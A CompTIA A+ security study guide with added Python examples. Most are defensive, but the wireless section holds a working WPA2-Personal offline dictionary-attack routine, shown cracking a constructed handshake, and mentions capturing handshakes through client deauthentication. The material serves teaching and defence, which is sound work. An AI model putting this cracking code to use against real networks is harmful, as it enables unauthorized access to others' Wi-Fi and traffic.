CompTIA A+ Security Study Guide

Fortifying Your Knowledge for CompTIA A+ Exam Core 2 (220-1102 Domain 2.0)

Welcome to your essential guide for Domain 2.0: Security, a critical component of the CompTIA A+ Core 2 (220-1102) exam. In an increasingly digital world, security is paramount. As an IT professional, you'll be responsible for safeguarding systems, data, and user privacy against a multitude of threats.

This guide delves into the core principles of security, covering physical and logical controls, wireless network security, malware protection and removal, understanding social engineering tactics, and fundamental incident response procedures. Mastering these concepts will empower you to implement robust security measures and protect valuable assets.

2.1 Physical Security Measures: The First Line of Defense

Physical security prevents unauthorized physical access to equipment, facilities, and resources. If an attacker can physically touch your hardware, logical security can often be bypassed.

Key Physical Controls

  • Locks: Standard door locks, deadbolts, server cabinet locks, cable locks for laptops and desktops.
  • Badges & Entry Control: ID badges, smart cards, key fobs for access control systems. Mantrap/access control vestibules.
  • Biometrics: Fingerprint scanners, retinal scanners, facial recognition for authentication.
  • Security Cameras (CCTV): Surveillance to monitor and record activity, acting as a deterrent and for forensic analysis.
  • Alarm Systems: Detect unauthorized entry and alert security personnel or authorities.
  • Server Rooms/Cages: Secure, dedicated areas with restricted access for critical infrastructure.
  • Signage & Guards: Visible warnings and security personnel can deter unauthorized access.
  • Asset Tracking Tags: RFID or barcode tags to monitor the location of valuable equipment.

2.2 Logical Security Controls: Protecting Data and Systems

Logical security uses software and data-based solutions to protect systems and information from unauthorized access, modification, or disclosure.

Authentication & Authorization:

  • Passwords: Enforce minimum length (the control that matters most), complexity, history, and expiration policies, and never leave default credentials in place. Current NIST guidance (SP 800-63B) favors long passphrases screened against breach lists over forced periodic expiration and composition rules, but the exam objectives still list all of these policy settings.
  • Multi-Factor Authentication (MFA): Requires two or more verification factors:
    • Something you know (password, PIN)
    • Something you have (token, smart card, phone app)
    • Something you are (biometrics)
  • Access Control Lists (ACLs): Define which users or groups have access to specific resources and what actions they can perform.
  • Principle of Least Privilege: Grant users only the necessary permissions to perform their job duties.
  • Account Management: Disable or remove accounts for terminated employees promptly. Regular account reviews.

Data Protection & System Security:

  • Encryption:
    • Full Disk Encryption (FDE): e.g., BitLocker (Windows), FileVault (macOS).
    • File/Folder Encryption: e.g., EFS (Windows), VeraCrypt.
    • Email Encryption: S/MIME, PGP.
  • Software Firewalls: Host-based firewalls (e.g., Windows Defender Firewall) control inbound/outbound network traffic for an individual system.
  • Directory Permissions: NTFS permissions (Windows), Unix-style permissions (Linux/macOS) to control file/folder access.
  • Disabling Unused Ports/Services: Reduce attack surface by turning off unnecessary network ports and system services.
  • Screen Savers & Auto-Lock: Password-protected screen savers and automatic system lock after inactivity.
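As an added example (not the study guide's own material), the script below decodes Unix-style permission strings as printed by ls -l into the octal modes used by chmod and audits a constructed directory listing for the conditions a technician most needs to spot: world-writable files, setuid binaries owned by root, setgid executables, and the sticky-bit exception that makes a world-writable /tmp acceptable. The listing lines are made up for the example; NTFS ACLs are not modeled.

```python
"""Decode Unix permission strings (as printed by `ls -l`) and audit them.

Added example, not from the study guide. The listing below is constructed
sample data; pipe real `ls -l` output into audit_listing() on a live system.
"""
import stat

# First character of the mode string -> file type bits
FILE_TYPES = {
    "-": stat.S_IFREG, "d": stat.S_IFDIR, "l": stat.S_IFLNK,
    "c": stat.S_IFCHR, "b": stat.S_IFBLK, "p": stat.S_IFIFO, "s": stat.S_IFSOCK,
}
# The nine permission positions: owner/group/other x read/write/execute
PERM_BITS = [
    stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
    stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
    stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH,
]
# Positions where s/S (setuid, setgid) or t/T (sticky) may appear in place of x
SPECIAL_BITS = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}


def parse_mode_string(mode_str: str) -> int:
    """'-rwsr-xr-x' -> integer st_mode (file type bits + permission bits)."""
    if len(mode_str) != 10 or mode_str[0] not in FILE_TYPES:
        raise ValueError(f"not a mode string: {mode_str!r}")
    mode = FILE_TYPES[mode_str[0]]
    for pos, ch in enumerate(mode_str[1:]):
        if ch == "-":
            continue
        if ch in "rwx":
            mode |= PERM_BITS[pos]
        elif ch in "sStT" and pos in SPECIAL_BITS:
            mode |= SPECIAL_BITS[pos]
            if ch.islower():            # lowercase = special bit AND execute bit both set
                mode |= PERM_BITS[pos]
        else:
            raise ValueError(f"bad permission char {ch!r} at position {pos}")
    return mode


def octal(mode: int) -> str:
    """Four-digit octal as used by chmod, e.g. 4755 for a setuid rwxr-xr-x file."""
    return format(stat.S_IMODE(mode), "04o")


def audit_entry(mode_str: str, owner: str, path: str) -> dict:
    """Flag the conditions worth questioning on a hardened system."""
    mode = parse_mode_string(mode_str)
    findings = []
    world_writable = bool(mode & stat.S_IWOTH)
    sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
    if world_writable and not sticky_dir:
        findings.append("world-writable")      # anyone can modify or replace it
    if mode & stat.S_ISUID and owner == "root":
        findings.append("setuid-root")         # runs as root for any caller; keep this list short
    if mode & stat.S_ISGID and not stat.S_ISDIR(mode):
        findings.append("setgid")
    return {"path": path, "octal": octal(mode), "findings": findings}


def audit_listing(listing: str) -> list:
    """Parse `ls -l` style lines (mode, links, owner, group, size, date..., path)."""
    results = []
    for line in listing.strip().splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        results.append(audit_entry(fields[0], fields[2], fields[-1]))
    return results


# Constructed listing (not real system output); sizes and dates are placeholders.
SAMPLE_LISTING = """
-rwsr-xr-x 1 root root   68208 Jan  1 12:00 /usr/bin/passwd
drwxrwxrwt 9 root root    4096 Jan  1 12:00 /tmp
-rw-rw-rw- 1 app  app      512 Jan  1 12:00 /srv/app/config.ini
-rw-r----- 1 root shadow   900 Jan  1 12:00 /etc/shadow
-rwxr-sr-x 1 root tty     1024 Jan  1 12:00 /usr/bin/wall
"""

if __name__ == "__main__":
    for r in audit_listing(SAMPLE_LISTING):
        print(f"{r['octal']}  {r['path']:<22} {', '.join(r['findings']) or 'ok'}")
```

The world-writable config file is the finding to fix first: any local user could edit it and the application would trust the result, which is exactly the failure of least privilege the section describes.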

2.3 Wireless Security Protocols: Securing Wi-Fi Networks

Wireless networks are convenient but introduce unique security risks. Proper configuration is essential to prevent unauthorized access and data interception.

Encryption Standards:

  • WEP (Wired Equivalent Privacy): Deprecated and cryptographically broken (RC4 with short, reused IVs; keys are recoverable in minutes). Do not use.
  • WPA (Wi-Fi Protected Access): Interim standard that kept RC4 but added TKIP per-packet keying; also deprecated. Use WPA2 or WPA3.
  • WPA2 (Wi-Fi Protected Access 2): Uses AES-CCMP encryption (TKIP only in legacy mixed mode). Still widely used and strong when configured with AES and a long passphrase, but the 4-way handshake is vulnerable to KRACK (key reinstallation) attacks on unpatched clients, and WPA2-Personal lets anyone who captures a handshake run an offline dictionary attack against the passphrase.
  • WPA3 (Wi-Fi Protected Access 3): Latest standard. Replaces the PSK handshake with Simultaneous Authentication of Equals (SAE), which gives forward secrecy and resists offline dictionary attacks; makes Protected Management Frames mandatory; and adds an optional 192-bit enterprise mode (GCMP-256). WPA3-Personal itself still uses AES-CCMP-128. The companion Wi-Fi Enhanced Open™ certification (Opportunistic Wireless Encryption) encrypts traffic on open networks without a password.

Authentication Methods:

  • PSK (Pre-Shared Key) / Personal Mode: Every device uses the same passphrase. Suitable for home/SOHO, but the whole network shares one secret: anyone who knows (or cracks) the passphrase can join and, on WPA2, decrypt other clients' traffic from a captured handshake. Use a long random passphrase and change it when a device or person leaves.
  • Enterprise Mode (802.1X): Authenticates each user or device individually against a RADIUS server using EAP, so access can be revoked per user and every client gets its own session key. Preferred for businesses. Requires at minimum a certificate on the RADIUS server so clients can verify who they are talking to; EAP-TLS also needs client certificates, which means running a PKI.
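To make concrete why a captured WPA2-Personal handshake is enough for an offline attack (and why SAE in WPA3 was introduced), here is an added example, not the guide's own material, that implements the passphrase-to-PMK mapping, the PTK derivation and the EAPOL-Key MIC from IEEE 802.11 in Python and then runs a wordlist against a constructed handshake. The MAC addresses, nonces, EAPOL bytes, network name and wordlist are all made up for the example; the PMK step is checked against the published 802.11 test vector (passphrase "password", SSID "IEEE").

```python
"""WPA2-Personal offline dictionary attack, end to end.

Added example for the study guide (not its own code). Everything below the
derivation functions is constructed test data: made-up MAC addresses, nonces and
an abbreviated EAPOL-Key frame, produced the way a legitimate client would.
"""
import hashlib
import hmac
from typing import Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11 passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes.
    The SSID is the only salt, so precomputed tables work per SSID, and a short or
    dictionary passphrase can be brute-forced without touching the network again."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK and the public handshake values. Its first
    16 bytes are the KCK, which authenticates the EAPOL-Key messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (AKM 00-0F-AC:2) MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC
    field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(capture: dict, wordlist) -> Optional[str]:
    """Offline: recompute PMK -> PTK -> MIC for each candidate and compare with the MIC
    the client sent in message 2. No further radio traffic is needed."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol_zeroed"]), capture["mic"]):
            return candidate
    return None


def make_capture(passphrase: str, ssid: str) -> dict:
    """Construct what an attacker holds after sniffing message 2 of the 4-way handshake.
    The client is simulated here with the real passphrase; the attacker never sees it,
    only the dict returned."""
    ap_mac = bytes.fromhex("02aabbccddee")          # made-up locally administered addresses
    sta_mac = bytes.fromhex("021122334455")
    anonce = bytes(range(0, 32))                     # fixed nonces so the run is repeatable
    snonce = bytes(range(32, 64))
    # Abbreviated EAPOL-Key frame: header, key info, replay counter, SNonce, zeroed MIC.
    eapol_zeroed = (b"\x01\x03\x00\x75\x02\x01\x0a\x00\x10" + b"\x00" * 8
                    + snonce + b"\x00" * 16 + b"\x00" * 10)
    kck = derive_ptk(wpa2_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_zeroed": eapol_zeroed, "mic": eapol_mic(kck, eapol_zeroed)}


if __name__ == "__main__":
    # Published 802.11 test vector: ("password", "IEEE") ->
    # f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
    print(wpa2_pmk("password", "IEEE").hex())
    capture = make_capture("sunshine2024", "HomeWiFi")   # constructed network
    wordlist = ["password", "letmein", "12345678", "sunshine2024", "qwertyui"]
    print("recovered passphrase:", crack_handshake(capture, wordlist))
```

Real tools (aircrack-ng, hashcat) perform exactly this loop, at GPU speed, against handshakes captured in seconds by deauthenticating a client. The only defences are a passphrase long enough that no wordlist contains it, or WPA3-SAE, whose handshake yields nothing that can be checked offline.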

Other Security Measures:

  • Change Default SSID & Admin Credentials: Don't use factory defaults for the network name or router login.
  • Disable SSID Broadcast (Concealment): Hides the network name from casual scans. Minor security benefit, easily bypassed by attackers.
  • MAC Filtering: Allows only specified MAC addresses to connect. Can be spoofed, so not a primary security measure.
  • Antenna Placement & Power Levels: Configure to cover only the intended area to reduce signal leakage.
  • Firmware Updates: Keep router/AP firmware up-to-date to patch vulnerabilities.
  • Guest Networks: Isolate guest traffic from the internal network.

2.4 Malware Protection & Removal: Combating Malicious Software

Malware (viruses, worms, trojans, ransomware, spyware, adware) poses a significant threat. Effective protection involves prevention, detection, and remediation.

Types of Malware & Protection Tools

Common Malware Types:

  • Viruses: Attach to legitimate programs, require human action to spread.
  • Worms: Self-replicating, spread across networks without human intervention.
  • Trojans: Disguise as legitimate software but contain malicious payloads.
  • Ransomware: Encrypts files and demands payment for decryption.
  • Spyware/Adware: Collects user information or displays unwanted ads.
  • Rootkits: Gain privileged access and hide their presence.
  • Keyloggers: Record keystrokes to steal credentials.
  • Bots/Botnets: Compromised computers controlled by an attacker.

Protection Software:

  • Antivirus (AV): Detects and removes known viruses using signature-based and heuristic detection.
  • Anti-malware: Broader scope, targets various malware types beyond just viruses.
  • Endpoint Detection and Response (EDR): Advanced threat detection, investigation, and response capabilities. Monitors endpoint activity.
  • Pop-up Blockers: Prevent annoying and potentially malicious pop-up windows.
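As an added example (not part of the guide), the scanner below contrasts the detection methods named above on constructed samples: an exact-hash signature, a byte-pattern signature with wildcard bytes (the style YARA rules use), and one simple heuristic, Shannon entropy, which flags packed or encrypted payloads that no signature can name. The sample "files" and the BEACON marker they contain are invented for the example; the one-byte variant shows why hash signatures alone are brittle.

```python
"""Signature-based vs heuristic detection on constructed samples.

Added example, not from the study guide. The 'files' below are byte strings
built inline; the BEACON marker is an invented pattern, not a real malware signature.
"""
import hashlib
import math
from collections import Counter


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_hex_pattern(pattern: str) -> list:
    """'43 4F ?? 3A' -> [0x43, 0x4F, None, 0x3A]; None is a wildcard byte."""
    return [None if tok == "??" else int(tok, 16) for tok in pattern.split()]


def pattern_match(data: bytes, pattern: list) -> int:
    """Offset of the first match of a wildcard pattern, or -1."""
    n = len(pattern)
    for off in range(len(data) - n + 1):
        if all(p is None or data[off + i] == p for i, p in enumerate(pattern)):
            return off
    return -1


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0. Plain text sits around 4-5; compressed, packed
    or encrypted data approaches 8, which is the heuristic signal."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


# "Definitions": a hash of one known-bad sample and a wildcard pattern that survives
# small edits to it. Both are constructed for this example.
KNOWN_BAD = b"MZ\x90\x00" + b"BEACON:" + b"\x01\x02" + b":END" + b" " * 40
HASH_SIGNATURES = {sha256_hex(KNOWN_BAD): "Example.Beacon.A"}
PATTERN_SIGNATURES = {
    "Example.Beacon.gen": parse_hex_pattern("42 45 41 43 4F 4E 3A ?? ?? 3A 45 4E 44"),
}
ENTROPY_THRESHOLD = 7.0


def scan(data: bytes) -> dict:
    """Run all three methods and report which fired."""
    hits = []
    name = HASH_SIGNATURES.get(sha256_hex(data))
    if name:
        hits.append(("signature-hash", name))
    for sig_name, pat in PATTERN_SIGNATURES.items():
        if pattern_match(data, pat) != -1:
            hits.append(("signature-pattern", sig_name))
    ent = shannon_entropy(data)
    if ent > ENTROPY_THRESHOLD:
        hits.append(("heuristic-entropy", f"{ent:.2f} bits/byte"))
    return {"entropy": round(ent, 2), "hits": hits, "malicious": bool(hits)}


def deterministic_noise(length: int) -> bytes:
    """Stand-in for a packed/encrypted payload: a SHA-256 chain, so runs are repeatable."""
    out, block = b"", b"seed"
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:length]


# Constructed samples
SAMPLES = {
    "readme.txt": b"This file is plain text and completely harmless. " * 8,
    "dropper.exe": KNOWN_BAD,
    "dropper_variant.exe": KNOWN_BAD.replace(b"\x01\x02", b"\x07\x02"),  # one byte changed
    "packed.bin": b"MZ\x90\x00" + deterministic_noise(2048),
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        r = scan(blob)
        print(f"{fname:<22} entropy={r['entropy']:>4}  {r['hits'] or 'clean'}")
```

The variant defeats the hash but not the pattern, and the packed sample defeats both signatures but not the heuristic; real products layer all three (plus behavioral monitoring, which is what EDR adds) because each method alone has a blind spot.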

Malware Removal Best Practices (CompTIA Steps)

  1. Identify and research malware symptoms.
  2. Quarantine the infected system(s): disconnect from the network (unplug the cable or disable Wi-Fi) so the malware cannot spread or call home.
  3. Disable System Restore (in Windows) so an infected restore point cannot be used to reintroduce the malware after cleanup.
  4. Remediate the infected systems:
    • Update anti-malware software (definitions and engine).
    • Scan and remove malware (may require Safe Mode or bootable media so the malware is not running while you scan).
  5. Schedule scans and run updates (OS and application patches close the hole that let the malware in).
  6. Enable System Restore and create a clean restore point (in Windows).
  7. Educate the end user (prevention is key).

2.5 Social Engineering & Common Threats: Exploiting Human Psychology

Social engineering manipulates people into divulging confidential information or performing actions. Awareness and training are crucial defenses.

Social Engineering Techniques:

  • Phishing: Broad email campaigns to trick users into revealing info or clicking malicious links.
  • Spear Phishing: Targeted phishing attacks, often personalized.
  • Whaling: Spear phishing targeting high-profile individuals (CEOs, CFOs).
  • Vishing (Voice Phishing): Phishing over the phone.
  • Smishing (SMS Phishing): Phishing via text messages.
  • Tailgating/Piggybacking: Following an authorized person into a restricted area.
  • Impersonation: Pretending to be someone else (e.g., IT support, vendor).
  • Dumpster Diving: Sifting through trash for sensitive information.
  • Shoulder Surfing: Observing someone entering credentials or sensitive data.
  • Hoaxes: False information designed to cause panic or trick users.
  • Watering Hole Attack: Compromising a website frequented by specific targets.

Other Common Threats:

  • Denial of Service (DoS) / Distributed DoS (DDoS): Overwhelming a system with traffic to make it unavailable.
  • Zero-Day Attack: Exploits a vulnerability before a patch is available.
  • Man-in-the-Middle (MitM), also called an on-path attack: Intercepting and possibly altering communication between two parties, e.g. via ARP spoofing or a rogue access point.
  • Brute Force / Dictionary Attacks: Systematically trying passwords.
  • Insider Threats: Malicious actions by current or former employees.

Prevention:

  • User education and awareness training.
  • Verify requests through separate channels.
  • Implement strong password policies and MFA.
  • Secure document disposal (shredding).

2.6 Incident Response & Data Security: Handling Breaches and Protecting Data

Effective incident response minimizes damage from security breaches. Data security encompasses backup, recovery, and secure disposal.

Incident Response (First Responder):

  1. Identify the incident: Recognize that a security event has occurred.
  2. Report through proper channels: Notify management, the security team, or the help desk as your policy directs; do not start investigating on your own.
  3. Collect and protect information: Preserve evidence (do not power off or "clean" the machine unless told to), document what you observed and when, and record who handled each item to maintain chain of custody.
  4. Containment: Isolate affected systems to prevent spread (e.g., disconnect from the network).
  5. Eradication & Recovery: Remove the threat and restore systems to normal operation from known-good media or backups.
  6. Lessons Learned: Post-incident review to improve future responses.

Data Security & Disposal:

  • Data Backup:
    • Types: Full, Incremental, Differential.
    • Strategy: 3-2-1 rule (3 copies, 2 different media, 1 offsite). Regular testing.
  • Data Recovery: Procedures to restore data from backups.
  • Secure Data Destruction:
    • Overwriting/Wiping: Using software to write patterns over every sector of the drive. Reliable for HDDs; not for SSDs, where wear leveling hides blocks from the host.
    • Degaussing: Using a strong magnetic field to erase magnetic media (HDDs, tapes). Modern HDDs are left unusable because the servo tracks are destroyed too, and it does nothing to SSDs or other flash media.
    • Physical Destruction: Shredding, pulverizing, drilling, incineration. Works for any media type.
  • Data Sensitivity & Compliance:
    • PII (Personally Identifiable Information)
    • PHI (Protected Health Information - HIPAA)
    • PCI DSS (Payment Card Industry Data Security Standard)
    • GDPR (General Data Protection Regulation)
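As an added example (not the guide's own), the simulation below runs the three backup types over a constructed week of file changes and works out, for each, how much data is captured and which backup sets must be restored, in order, to recover a given day. It also shows the failure mode that makes "regular testing" more than a slogan: a single lost incremental silently yields a stale restore, while a differential only ever depends on the last full.

```python
"""Full, incremental and differential backups: what each captures and what a restore needs.

Added example, not from the study guide. File contents are constructed; a real
job would key on modification time or the archive attribute rather than on content.
"""


def changed_since(current: dict, baseline: dict) -> dict:
    """Files that are new or modified relative to `baseline` (deletions are ignored
    here to keep the model small)."""
    return {name: data for name, data in current.items() if baseline.get(name) != data}


def run_backups(snapshots: list, policy: str) -> list:
    """snapshots: [(label, {filename: content}), ...] in chronological order.
    policy: 'incremental' (changes since the previous backup of any type) or
    'differential' (changes since the last full). The first snapshot is a full backup."""
    if policy not in ("incremental", "differential"):
        raise ValueError(policy)
    backups, last_full, last_any = [], None, None
    for i, (label, files) in enumerate(snapshots):
        if i == 0:
            kind, baseline = "full", {}
        elif policy == "incremental":
            kind, baseline = "incremental", last_any
        else:
            kind, baseline = "differential", last_full
        backups.append({"day": label, "type": kind, "files": changed_since(files, baseline)})
        if kind == "full":
            last_full = files
        last_any = files
    return backups


def restore_chain(backups: list, target: int) -> list:
    """Indices of the backup sets needed, in restore order, to recover day `target`."""
    full = max(i for i in range(target + 1) if backups[i]["type"] == "full")
    if backups[target]["type"] == "full":
        return [full]
    if backups[target]["type"] == "differential":
        return [full, target]                      # last full + the one differential
    return list(range(full, target + 1))           # last full + every incremental since


def restore(backups: list, indices: list) -> dict:
    """Apply the chosen sets in order; later sets overwrite earlier versions of a file."""
    state = {}
    for i in indices:
        state.update(backups[i]["files"])
    return state


def storage_cost(backups: list) -> int:
    """Total file versions stored across all sets (a stand-in for bytes on media)."""
    return sum(len(b["files"]) for b in backups)


# Constructed week: Monday is the baseline, then a few edits per day.
WEEK = [
    ("Mon", {"report.docx": "v1", "budget.xlsx": "v1", "notes.txt": "v1"}),
    ("Tue", {"report.docx": "v2", "budget.xlsx": "v1", "notes.txt": "v1"}),
    ("Wed", {"report.docx": "v2", "budget.xlsx": "v2", "notes.txt": "v1"}),
    ("Thu", {"report.docx": "v3", "budget.xlsx": "v2", "notes.txt": "v2"}),
]

if __name__ == "__main__":
    for policy in ("incremental", "differential"):
        sets = run_backups(WEEK, policy)
        chain = restore_chain(sets, 3)
        print(f"{policy:<12} stored={storage_cost(sets)} file versions, "
              f"restoring Thu needs {[sets[i]['day'] for i in chain]}")
    inc = run_backups(WEEK, "incremental")
    print("incremental restore with Wed's set lost:", restore(inc, [0, 1, 3]))
```

Incrementals are cheapest to take and slowest and most fragile to restore; differentials cost more media each day but need only two sets. Whichever you pick, the 3-2-1 rule covers where the copies live, and a periodic test restore is the only way to learn that a set in the chain is unreadable before you depend on it.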

CompTIA A+ Security FAQ

What is the primary purpose of Multi-Factor Authentication (MFA)?
The primary purpose of MFA is to add an extra layer of security beyond just a username and password. By requiring two or more different types of verification factors (something you know, have, or are), MFA makes it significantly harder for unauthorized users to gain access even if one factor (like a password) is compromised.
As a first responder to a security incident, what is one of the most important initial steps?
One of the most important initial steps is to identify that an incident has occurred and then report it through the proper channels according to your organization's policy. Proper reporting ensures that the incident is handled correctly and that the appropriate teams are involved. Before extensive action, documentation and evidence preservation (if applicable) are also crucial.
Which method of secure data destruction is suitable for solid-state drives (SSDs)?
For SSDs, degaussing is ineffective because flash stores data as electrical charge, not magnetism, and repeated overwriting is unreliable because wear leveling and over-provisioning leave blocks the host cannot address. The reliable options are the drive's own firmware sanitize commands (ATA Secure Erase, NVMe Sanitize), cryptographic erase (if the drive was fully encrypted, destroying the key makes the data unrecoverable), and physical destruction (shredding, pulverizing), which provides the highest assurance for highly sensitive data. Whichever method is used, verify the result, and obtain a certificate of destruction when a third party does the work.

Building a Strong Security Foundation

The security landscape is constantly evolving, but the principles covered in CompTIA A+ Core 2 Domain 2.0 provide a vital foundation for any IT professional. From implementing physical safeguards and configuring logical controls to recognizing social engineering tactics and responding to incidents, these skills are indispensable for protecting digital assets.

Continuously update your security knowledge, stay informed about new threats and countermeasures, and always practice security-conscious behavior. Your diligence will be key to maintaining the integrity, confidentiality, and availability of systems and data. Best of luck as you pursue your A+ certification and beyond!